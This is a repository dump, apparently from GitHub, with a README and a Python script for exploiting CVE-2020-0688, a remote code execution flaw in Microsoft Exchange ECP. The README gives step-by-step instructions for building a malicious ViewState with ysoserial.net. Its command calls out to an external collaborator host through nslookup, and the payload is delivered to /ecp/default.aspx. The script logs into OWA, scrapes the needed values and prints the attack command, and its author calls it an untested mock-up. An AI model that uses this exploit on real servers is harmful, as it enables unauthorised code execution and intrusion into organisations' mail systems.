Full Code of random-robbie/cve-2020-0688 for AI

Repository: random-robbie/cve-2020-0688
Branch: master
Commit: d3d558144d3c
Files: 2
Total size: 2.7 KB

Directory structure:
gitextract__7wfsuof/

├── README.md
└── exploit.py

================================================
FILE CONTENTS
================================================

================================================
FILE: README.md
================================================
# cve-2020-0688
cve-2020-0688

Login with a user with an email address privliage is nothing to worry about.

Grab -  `__VIEWSTATEGENERATOR` from page source
Grab - the value of `ASP.NET_SessionId` cookie for viewstateuserkey value

[Download YSO Here](https://github.com/pwntester/ysoserial.net/releases/download/v1.32/ysoserial-1.32.zip)


```
ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "nslookup teasdas.myburpcollab.net" --validationalg="SHA1" --validationkey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" --generator="B97B4E27" --viewstateuserkey="05ae4b41-51e1-4c3a-9241-6b87b169d663" --isdebug –islegacy
```

GET TO:

```
https://localhost/ecp/default.aspx?__VIEWSTATEGENERATOR=<generator>&__VIEWSTATE=<ViewState>
```

The Exploit.py is untested and need a demo system to fire up and play with.


================================================
FILE: exploit.py
================================================
#
# THIS WILL NOT WORK IT NEEDS WORK
#
#
# This is a mock up of a exploit flow i need a system i can test on this to make it work but here is the base code to get some where
#
# By Random_Robbie 
#
#
import requests
import argparse
import re

parser = argparse.ArgumentParser()
parser.add_argument("-s", "--server", required=True, help="ECP Server")
parser.add_argument("-u", "--user", required=True, help="Email Address")
parser.add_argument("-p", "--password", required=True, help="Password")

args = parser.parse_args()


owa_login_form_url = args.server

user_name = args.user
pwd = args.password




session = requests.Session()

paramsPost = {"password":""+pwd+"","isUtf8":"1","passwordText":"","trusted":"4","destination":""+owa_login_form_url+"","flags":"4","forcedownlevel":"0","username":""+user_name+""}
headers = {"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8","Upgrade-Insecure-Requests":"1","User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:73.0) Gecko/20100101 Firefox/73.0","Connection":"close","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Content-Type":"application/x-www-form-urlencoded"}
cookies = {"PBack":"0","PrivateComputer":"true"}
response = session.post(""+owa_login_form_url+"auth.owa", data=paramsPost, headers=headers, cookies=cookies)

print("Status code:   %i" % response.status_code)
if "reason=2" in response.text:
	print ("Login Incorrect")
else:
	VIEWSTATEGENERATOR = re.compile('id="__VIEWSTATEGENERATOR" value="(.+?)"').findall(str(response.text))[0]
	viewstateuserkey = re.compile('ASP.NET_SessionId=(.+?) Time').findall(str(response.headers))[0]
	print("""ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "nslookup teasdas.myburpcollab.net" --validationalg="SHA1" --validationkey="""+VIEWSTATEGENERATOR+""" --generator="B97B4E27" --viewstateuserkey="""+viewstateuserkey+""" --isdebug –islegacy""")